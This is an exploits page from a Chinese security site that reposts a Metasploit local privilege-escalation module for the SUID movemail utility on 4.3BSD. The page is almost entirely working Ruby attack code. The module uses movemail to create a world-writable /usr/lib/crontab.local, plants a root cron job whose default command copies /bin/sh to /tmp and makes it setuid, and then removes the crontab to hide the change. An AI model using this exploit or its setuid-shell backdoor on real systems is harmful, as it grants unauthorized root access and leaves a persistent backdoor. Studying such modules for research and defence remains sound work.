首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Emacs movemail Privilege Escalation
来源:metasploit.com 作者:wvu 发布时间:2018-12-04  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local

  Rank = ExcellentRanking

  include Msf::Post::File

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Emacs movemail Privilege Escalation',
      'Description'    => %q{
        This module exploits a SUID installation of the Emacs movemail utility
        to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.
        The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.
      },
      'Author'         => [
        'Markus Hess', # Discovery? atrun(8) exploit for sure
        'Cliff Stoll', # The Cuckoo's Egg hacker tracker
        'wvu'          # Module and additional research
      ],
      'References'     => [
        %w[URL https://en.wikipedia.org/wiki/Movemail],
        %w[URL https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg],
        %w[URL http://pdf.textfiles.com/academics/wilyhacker.pdf],
        %w[URL https://www.gnu.org/software/emacs/manual/html_node/efaq/Security-risks-with-Emacs.html],
        %w[URL https://www.gnu.org/software/emacs/manual/html_node/emacs/Movemail.html],
        %w[URL https://mailutils.org/manual/html_node/movemail.html]
      ],
      'DisclosureDate' => '1986-08-01', # Day unknown, assuming first of month
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'SessionTypes'   => %w[shell],
      'Privileged'     => true,
      'Payload'        => {'BadChars' => "\n", 'Encoder' => 'generic/none'},
      'Targets'        => [['/usr/lib/crontab.local', {}]],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {
        'PAYLOAD'      => 'cmd/unix/generic',
        'CMD'          => 'cp /bin/sh /tmp && chmod u+s /tmp/sh'
      }
    ))

    register_options([
      OptString.new('MOVEMAIL', [true, 'Path to movemail', '/etc/movemail'])
    ])

    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false])
    ])
  end

  def bin_path
    '/bin:/usr/bin:/usr/ucb:/etc'
  end

  def movemail
    datastore['MOVEMAIL']
  end

  def crontab_local
    '/usr/lib/crontab.local'
  end

  def crontab(cmd)
    "* * * * * root #{cmd}\n* * * * * root rm -f #{crontab_local}"
  end

  # uname(1) does not exist, technique from /etc/rc.local
  def is_43bsd?
    cmd_exec('strings /vmunix | grep UNIX').include?('4.3 BSD')
  end

  # id(1) does not exist
  def is_root?
    cmd_exec('whoami').include?('root')
  end

  # test -u does not exist
  def setuid_root?(path)
    cmd_exec("find #{path} -user root -perm -4000 -print").include?(path)
  end

  def setup
    super

    vprint_status("Setting a sane $PATH: #{bin_path}")

    case cmd_exec('echo $SHELL')
    when %r{/bin/sh}
      vprint_status('Current shell is /bin/sh')
      cmd_exec("PATH=#{bin_path}; export PATH")
    when %r{/bin/csh}
      vprint_status('Current shell is /bin/csh')
      cmd_exec("setenv PATH #{bin_path}")
    else
      vprint_bad('Current shell is unknown')
    end

    vprint_status("$PATH is #{cmd_exec('echo $PATH').chomp}")
  end

  def check
    unless is_43bsd?
      vprint_warning('System does not appear to be 4.3BSD')
    end

    unless file?(movemail)
      vprint_bad("#{movemail} not found")
      return CheckCode::Safe
    end

    unless movemail.end_with?('movemail')
      vprint_warning("#{movemail} has an unexpected name")
    end

    unless setuid_root?(movemail)
      vprint_status("Non-SUID-root #{movemail} found")
      return CheckCode::Detected
    end

    vprint_good("SUID-root #{movemail} found")
    CheckCode::Appears
  end

  def exploit
    if is_root?
      print_good('Session is already root, executing payload directly')
      return cmd_exec(payload.encoded)
    end

    unless check == CheckCode::Appears || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end

    # outdesc = open (outname, O_WRONLY | O_CREAT | O_EXCL, 0666);
    if file?(crontab_local)
      fail_with(Failure::NoTarget, "#{crontab_local} already exists")
    end

    print_status('Preparing crontab with payload')
    tab = crontab(payload.encoded)
    vprint_line(tab)

    # umask (umask (0) & 0333);
    # (void) ftruncate (indesc, 0L);
    print_status("Creating writable #{crontab_local}")
    cmd_exec("(umask 0 && #{movemail} /dev/null #{crontab_local})")

    unless writable?(crontab_local)
      fail_with(Failure::NoAccess, "#{crontab_local} is not writable")
    end

    print_good("Writing crontab to #{crontab_local}")
    cmd_exec("echo '#{tab.gsub("'", "'\\\\''")}' > #{crontab_local}")
    print_warning('Please wait at least one minute for effect')
  end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·NEC Univerge Sv9100 WebPro 6.0
·HP Intelligent Management Java
·Apache Superset 0.23 - Remote
·Mozilla Firefox 63.0.1 - Denia
·Joomla! Component JE Photo Gal
·PaloAlto Networks Expedition M
·Fleetco Fleet Maintenance Mana
·CyberArk 9.7 - Memory Disclosu
·Joomla JCE 2.6.33 Arbitrary Fi
·Apache Spark - Unauthenticated
·VBScript - 'rtFilter' Out-of-B
·VBScript - 'OLEAUT32!VariantCl
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved